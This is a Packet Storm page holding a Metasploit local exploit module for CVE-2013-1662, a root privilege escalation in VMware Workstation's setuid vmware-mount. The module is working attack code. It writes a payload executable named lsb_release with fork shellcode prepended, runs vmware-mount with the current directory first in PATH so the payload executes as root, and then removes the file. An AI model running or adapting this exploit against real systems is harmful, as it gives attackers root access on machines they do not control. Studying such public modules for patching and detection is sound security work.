VMWare Workstation (up to and including 9.0.2 build-1031769) and Player have a setuid executable called vmware-mount that invokes lsb_release in the PATH with popen(3). Since PATH is user-controlled, and the default system shell on Debian-derived distributions does not drop privs, we can put an arbitrary payload in an executable called lsb_release and have vmware-mount happily execute it as root for us.
f174ca6c5c6bd8439fdc4605e284321b##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
class Metasploit4 < Msf::Exploit::Local
include Msf::Exploit::EXE
include Msf::Post::Common
include Msf::Post::File
def initialize(info={})
super( update_info( info, {
'Name' => 'VMWare Setuid vmware-mount Unsafe popen(3)',
'Description' => %q{
VMWare Workstation (up to and including 9.0.2 build-1031769)
and Player have a setuid executable called vmware-mount that
invokes lsb_release in the PATH with popen(3). Since PATH is
user-controlled, and the default system shell on
Debian-derived distributions does not drop privs, we can put
an arbitrary payload in an executable called lsb_release and
have vmware-mount happily execute it as root for us.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Tavis Ormandy', # Vulnerability discovery and PoC
'egypt' # Metasploit module
],
'Platform' => [ 'linux' ],
'Arch' => ARCH_X86,
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultOptions' => {
"PrependSetresuid" => true,
"PrependSetresgid" => true,
},
'Privileged' => true,
'DefaultTarget' => 0,
'References' => [
[ 'CVE', '2013-1662' ],
[ 'OSVDB', '96588' ],
[ 'BID', '61966'],
[ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ],
[ 'URL', 'http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ]
],
'DisclosureDate' => "Aug 22 2013"
}
))
# Handled by ghetto hardcoding below.
deregister_options("PrependFork")
end
def check
if setuid?("/usr/bin/vmware-mount")
CheckCode::Vulnerable
else
CheckCode::Safe
end
end
def exploit
unless check == CheckCode::Vulnerable
fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
end
# Ghetto PrependFork action which is apparently only implemented for
# Meterpreter.
# XXX Put this in a mixin somewhere
# if(fork()) exit(0);
# 6A02 push byte +0x2
# 58 pop eax
# CD80 int 0x80 ; fork
# 85C0 test eax,eax
# 7406 jz 0xf
# 31C0 xor eax,eax
# B001 mov al,0x1
# CD80 int 0x80 ; exit
exe = generate_payload_exe(
:code => "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80" + payload.encoded
)
write_file("lsb_release", exe)
cmd_exec("chmod +x lsb_release")
cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
# Delete it here instead of using FileDropper because the original
# session can clean it up
cmd_exec("rm -f lsb_release")
end
def setuid?(remote_file)
!!(cmd_exec("test -u /usr/bin/vmware-mount && echo true").index "true")
end
end
© 2015 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!